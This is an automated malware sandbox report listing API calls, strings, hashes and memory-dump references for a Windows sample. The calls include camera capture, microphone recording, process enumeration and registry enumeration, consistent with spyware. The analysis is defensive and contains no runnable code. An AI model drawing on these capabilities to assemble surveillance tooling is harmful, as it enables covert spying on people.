                                              • String ID:
                                              • API String ID: 3525466593-0
                                              • Opcode ID: 52b81f30389fdc70d90d0f3926259370642d0b6a161d85254e9b8d59ab558572
                                              • Instruction ID: e8e790079d861cd165c7fd42d744f17320cd281bbc0625e68362a254ac43e6ec
                                              • Opcode Fuzzy Hash: 52b81f30389fdc70d90d0f3926259370642d0b6a161d85254e9b8d59ab558572
                                              • Instruction Fuzzy Hash: 1961A1702007059BDB609F69CD81B6A7BE6BF84710F44411BF90D8B786EBB4E855CBB2
                                              APIs
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • _free.LIBCMT ref: 00104086
                                              • _free.LIBCMT ref: 0010409D
                                              • _free.LIBCMT ref: 001040BC
                                              • _free.LIBCMT ref: 001040D7
                                              • _free.LIBCMT ref: 001040EE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$AllocateHeap
                                              • String ID:
                                              • API String ID: 3033488037-0
                                              • Opcode ID: 43d016fd051c3b2bccd88b2b9b869c50cbb699ecf089f191a2de090f9720e3c7
                                              • Instruction ID: f1832dfc0f1d252eee5e321e8e8d67f292c7467334e1b05e89be427abfc81c3b
                                              • Opcode Fuzzy Hash: 43d016fd051c3b2bccd88b2b9b869c50cbb699ecf089f191a2de090f9720e3c7
                                              • Instruction Fuzzy Hash: 1251F771A00208EFDB24DF69DC81AAA77F4EF54320F144169FA89E72D4E7B1E951CB40
                                              APIs
                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004BD355,?), ref: 004C5CDD
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5D5B
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5DC0
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5DE4
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5E44
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: ExchangeInterlocked$QueryVirtual
                                              • String ID:
                                              • API String ID: 2947987494-0
                                              • Opcode ID: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction ID: d4fd967b9ef2ddb5f493da4d0830cd1fabe8dda03b298e9488f7d68cad15bcae
                                              • Opcode Fuzzy Hash: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction Fuzzy Hash: C951C238A00F518FDFA48B58D8C4F6E73A5EB41714F64812FD4129B2A5D778F9C28A48
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction ID: 06e022bca2f044a232651a0051462ae43df652e2cdae1c6bcfd5a88350d1bcd9
                                              • Opcode Fuzzy Hash: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction Fuzzy Hash: BD41B1B5C00265AACF20BF769C84AEF7A64EB41728710413FF919A62A1D73C4D458BBD
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 000C3E8A
                                                • Part of subcall function 000C3FCD: __EH_prolog.LIBCMT ref: 000C3FD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologSleep
                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                              • API String ID: 3469354165-3547787478
                                              • Opcode ID: 9af908b6b1f96449d0e8cea9e32d22f3aee331d98e465cbe3faf00872f5b81ea
                                              • Instruction ID: fa16b9b65d6158734b2cceea406a15839b2b3d7302c1ad1cb4819e9f053d2483
                                              • Opcode Fuzzy Hash: 9af908b6b1f96449d0e8cea9e32d22f3aee331d98e465cbe3faf00872f5b81ea
                                              • Instruction Fuzzy Hash: 8E41A131A18250A7CB14FB78D856FED7BB16B42700F00892DF80697AD7EF308A46C792
                                              APIs
                                                • Part of subcall function 000DB15B: GetCurrentProcess.KERNEL32(?,?,?,000CC914,WinDir,00000000,00000000), ref: 000DB16C
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000CE6C1
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 000CE6E5
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 000CE6F4
                                              • CloseHandle.KERNEL32(00000000), ref: 000CE8AB
                                                • Part of subcall function 000DB187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,000CE4D0,00000000,?,?,00134358), ref: 000DB19C
                                                • Part of subcall function 000DB37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 000DB395
                                                • Part of subcall function 000DB37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 000DB3A8
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 000CE89C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 4269425633-0
                                              • Opcode ID: e7ff7dc37328e10b1f68027601610fb6cc9f43bc7fb40cacd7a4d1f721d78136
                                              • Instruction ID: 7ab0a350749d992c034ad3ccf5fd2a34261d1a43ff0ca41e7f0968e37a2d2dd4
                                              • Opcode Fuzzy Hash: e7ff7dc37328e10b1f68027601610fb6cc9f43bc7fb40cacd7a4d1f721d78136
                                              • Instruction Fuzzy Hash: 7141CF311083509BC325F760DDA2FEF77A5AFA6300F50452DF98A86293EF30AA49C656
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: ff9dd77244b00e03d7ef63492651198d63d28d6f3ccd05d3894caacb64bd3055
                                              • Instruction ID: e9af3800b8d8fbb63d99e5c70aa2d5716b153cdf639824cc494933793489a89c
                                              • Opcode Fuzzy Hash: ff9dd77244b00e03d7ef63492651198d63d28d6f3ccd05d3894caacb64bd3055
                                              • Instruction Fuzzy Hash: DD41C536B00204AFCB24DF78C881A6DB7E5EF89714F158569E965EB381DB71EE01CB80
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,000FE3ED,?,00000000,?,00000001,?,?,00000001,000FE3ED,?), ref: 0010FF20
                                              • __alloca_probe_16.LIBCMT ref: 0010FF58
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010FFA9
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,000F99BF,?), ref: 0010FFBB
                                              • __freea.LIBCMT ref: 0010FFC4
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              • String ID:
                                              • API String ID: 313313983-0
                                              • Opcode ID: 21d0c8f175cb8d4ed043b9eaf77cf8cb7dc44678ba34d8eabc09900d475eebe8
                                              • Instruction ID: cde271786776c5f6690bd1fcba7d8140d89347da14852b899b33ad190c07847a
                                              • Opcode Fuzzy Hash: 21d0c8f175cb8d4ed043b9eaf77cf8cb7dc44678ba34d8eabc09900d475eebe8
                                              • Instruction Fuzzy Hash: E531FE32A0021BABDB289F64DC42EEE7BA5EB45310F05416DFC04D7691EB75CD52CBA0
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 000C197B
                                              • waveInOpen.WINMM(00131AF8,000000FF,00131B00,Function_00001A8E,00000000,00000000,00000024), ref: 000C1A11
                                              • waveInPrepareHeader.WINMM(00131AC0,00000020,00000000), ref: 000C1A66
                                              • waveInAddBuffer.WINMM(00131AC0,00000020), ref: 000C1A75
                                              • waveInStart.WINMM ref: 000C1A81
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                              • String ID:
                                              • API String ID: 1356121797-0
                                              • Opcode ID: 05a4634b678c90e95d5e7e15df972cb167750a229b03815be8a7bd8b5cfc84dd
                                              • Instruction ID: 31ae22179cd6f14f0c0476d32b62391b867c659be28e7f8a828f12feb5e921cf
                                              • Opcode Fuzzy Hash: 05a4634b678c90e95d5e7e15df972cb167750a229b03815be8a7bd8b5cfc84dd
                                              • Instruction Fuzzy Hash: 02216D31601280BBC7089F66AE15AAABBB5FB95752B00812EF115D7EF5EB744880CB04
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000CFBFC
                                              • int.LIBCPMT ref: 000CFC0F
                                                • Part of subcall function 000CCEE0: std::_Lockit::_Lockit.LIBCPMT ref: 000CCEF1
                                                • Part of subcall function 000CCEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 000CCF0B
                                              • std::_Facet_Register.LIBCPMT ref: 000CFC4B
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000CFC71
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000CFC8D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              • String ID:
                                              • API String ID: 2536120697-0
                                              • Opcode ID: 50440171058142de69dc4ed9e3da6fb150c4fefe01dbe7864fd61b4c69fad84a
                                              • Instruction ID: 7ff3fb1c687ad83ed6884db8d940c4953807b613b513f20394259f2bfdf1eeb0
                                              • Opcode Fuzzy Hash: 50440171058142de69dc4ed9e3da6fb150c4fefe01dbe7864fd61b4c69fad84a
                                              • Instruction Fuzzy Hash: 3D11E432A0051DA7CB14FBA4D986EFEB76A9F40750F20006DF905B7282EB309F42D792
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0010E144
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010E167
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0010E18D
                                              • _free.LIBCMT ref: 0010E1A0
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010E1AF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 7e4f31e6c2233a6dc56e75bf3b278f9ec9ccf57d4789e0ef5a5d3b9badedebf3
                                              • Instruction ID: 3ee9f64dd9982350ff43bfbc0182e6b5da18cbbcb2bcefde2113e8c165dc35bb
                                              • Opcode Fuzzy Hash: 7e4f31e6c2233a6dc56e75bf3b278f9ec9ccf57d4789e0ef5a5d3b9badedebf3
                                              • Instruction Fuzzy Hash: 2301B1726012157FA3256ABB6C8CCBB6ABDDEC2BA13194528BD44C62C0DBB08C0191B0
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000CFEDF
                                              • int.LIBCPMT ref: 000CFEF2
                                                • Part of subcall function 000CCEE0: std::_Lockit::_Lockit.LIBCPMT ref: 000CCEF1
                                                • Part of subcall function 000CCEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 000CCF0B
                                              • std::_Facet_Register.LIBCPMT ref: 000CFF2E
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000CFF54
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000CFF70
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              • String ID:
                                              • API String ID: 2536120697-0
                                              • Opcode ID: 2ae572a2ca79acc0057f54815d16b2bce0bfe71b29af1f9caab2507da6868338
                                              • Instruction ID: 746812ca4cdccb03f6b4aecd6e643f600d8fcc74ddb88cc986fed3e825804925
                                              • Opcode Fuzzy Hash: 2ae572a2ca79acc0057f54815d16b2bce0bfe71b29af1f9caab2507da6868338
                                              • Instruction Fuzzy Hash: D1119E31900519ABCB15FBA4C946EEEB77ADF41714B20006DF909A7292EF30AF06D792
                                              APIs
                                              • GetLastError.KERNEL32(000F4403,000F4403,?,00105359,00106B42,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?), ref: 00106F48
                                              • _free.LIBCMT ref: 00106F7D
                                              • _free.LIBCMT ref: 00106FA4
                                              • SetLastError.KERNEL32(00000000,?,000F4403), ref: 00106FB1
                                              • SetLastError.KERNEL32(00000000,?,000F4403), ref: 00106FBA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 40944695f67bca0d5f80942cecc76a0999d32b2dd1ff1d2b900db1b545844939
                                              • Instruction ID: 24404740e8dd258d3b4b49c99a39a3b25924c9368c4ed07e965c7708ffd181b4
                                              • Opcode Fuzzy Hash: 40944695f67bca0d5f80942cecc76a0999d32b2dd1ff1d2b900db1b545844939
                                              • Instruction Fuzzy Hash: AB01F43620C7026BC61622747D95D6F25799BE63B07260128F994E22C2EFF4DC658120
                                              APIs
                                              • _free.LIBCMT ref: 0010F7B5
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 0010F7C7
                                              • _free.LIBCMT ref: 0010F7D9
                                              • _free.LIBCMT ref: 0010F7EB
                                              • _free.LIBCMT ref: 0010F7FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 0606653dd7625bd154aa5012d0b3e1ff77958d4383ac7ace35bf7d08ecbd05a1
                                              • Instruction ID: 8008e00f4ef4795b3c16785a84c8f53c2e92fbf170f8b021ac5b058c5dd45c8f
                                              • Opcode Fuzzy Hash: 0606653dd7625bd154aa5012d0b3e1ff77958d4383ac7ace35bf7d08ecbd05a1
                                              • Instruction Fuzzy Hash: 75F01232904604BBC671EB58E8C6C5673E9AB54720768481DF484E7D85CBB0FCD18A50
                                              APIs
                                              • _free.LIBCMT ref: 00103305
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 00103317
                                              • _free.LIBCMT ref: 0010332A
                                              • _free.LIBCMT ref: 0010333B
                                              • _free.LIBCMT ref: 0010334C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 94681616cd34c8b7bfffe975d7b014544dd8ec4ff7fb20f1c9c0f42bf963fd55
                                              • Instruction ID: 03ac597a1d2282ba5479ac0d1543786ca169717b43dfe7d0f5042771d2a1fcdc
                                              • Opcode Fuzzy Hash: 94681616cd34c8b7bfffe975d7b014544dd8ec4ff7fb20f1c9c0f42bf963fd55
                                              • Instruction Fuzzy Hash: 66F05E70D06264FBDB02BF14BD415883FA4B7587613050106F89567EBAEB7419E5EB81
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040D2BD
                                                • Part of subcall function 0040906B: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,0040D2D4,64-bit,00000000), ref: 004090A6
                                                • Part of subcall function 0040906B: CheckTokenMembership.ADVAPI32(00000000,?,0040D2D4,?,0040D2D4,64-bit,00000000,00000000), ref: 004090BB
                                                • Part of subcall function 0040906B: FreeSid.ADVAPI32(?,?,0040D2D4,64-bit,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004090CB
                                              Strings
                                              • Message, xrefs: 0040D2E5
                                              • 64-bit, xrefs: 0040D2C9
                                              • **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php, xrefs: 0040D2F2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeH_prologInitializeMembershipToken
                                              • String ID: **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php$64-bit$Message
                                              • API String ID: 823383314-662163179
                                              • Opcode ID: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction ID: 480cf2e0fd4845596181bfe692aa14e385947aba559717c7c60188e3466bd68c
                                              • Opcode Fuzzy Hash: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction Fuzzy Hash: 6EC16D70A00245DFDB10DFA4C888BEEBBE1AF49304F5444BEE84AAB3D2CB795945CB55
                                              APIs
                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 000D2A1D
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 000D2A4C
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 000D2AED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Enum$InfoQueryValue
                                              • String ID: [regsplt]
                                              • API String ID: 3554306468-4262303796
                                              • Opcode ID: a458f9a301647d3b360919554567bbc0f268490c3ee84a84c83fa872f5d985d5
                                              • Instruction ID: 855c5bd3e2260eb085a7f9407f56ca6385880068595b1b7805ea92289b016d64
                                              • Opcode Fuzzy Hash: a458f9a301647d3b360919554567bbc0f268490c3ee84a84c83fa872f5d985d5
                                              • Instruction Fuzzy Hash: F9510C72108345AFD314EB60D895EEFB7ECEF95700F40492EB596D2152EB70EA098B62
                                              APIs
                                              • _strpbrk.LIBCMT ref: 0010D4A8
                                              • _free.LIBCMT ref: 0010D5C5
                                                • Part of subcall function 000FA854: IsProcessorFeaturePresent.KERNEL32(00000017,000FA826,000F4403,?,?,?,000F4403,00000016,?,?,000FA833,00000000,00000000,00000000,00000000,00000000), ref: 000FA856
                                                • Part of subcall function 000FA854: GetCurrentProcess.KERNEL32(C0000417,?,000F4403), ref: 000FA878
                                                • Part of subcall function 000FA854: TerminateProcess.KERNEL32(00000000,?,000F4403), ref: 000FA87F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                              • String ID: *?$.
                                              • API String ID: 2812119850-3972193922
                                              • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                              • Instruction ID: c4019d36bee262a1fbdda54f54d14529c67c758598867897d7f2eb8b0d331b0e
                                              • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                              • Instruction Fuzzy Hash: 1251B171E00209AFDF14DFA8D881AADB7B5FF58314F25816AE894E7381E7B59A018B50
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4wECQoBvYC.exe,00000104), ref: 00102714
                                              • _free.LIBCMT ref: 001027DF
                                              • _free.LIBCMT ref: 001027E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe
                                              • API String ID: 2506810119-4277792811
                                              • Opcode ID: 19a5fe7dd39da4a5ad413ab156aeb9fda98ad60691beab32416d80d2f3f0b5a0
                                              • Instruction ID: c5ab787550a942712ae1e92dd766688e82af076659ba42cf9a5b783ef35c1f2e
                                              • Opcode Fuzzy Hash: 19a5fe7dd39da4a5ad413ab156aeb9fda98ad60691beab32416d80d2f3f0b5a0
                                              • Instruction Fuzzy Hash: A2319271A00248BFDB21DF99DC89D9EBBFCEBA5310F144066F944A7291D7F08A81DB51
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406322
                                              • CoCreateInstance.OLE32(004E8254,00000000,00000001,004E8264,?), ref: 0040634B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CreateH_prologInstance
                                              • String ID: Message$get_LocalPolicy failed: 0x%08lx
                                              • API String ID: 457505298-1432678775
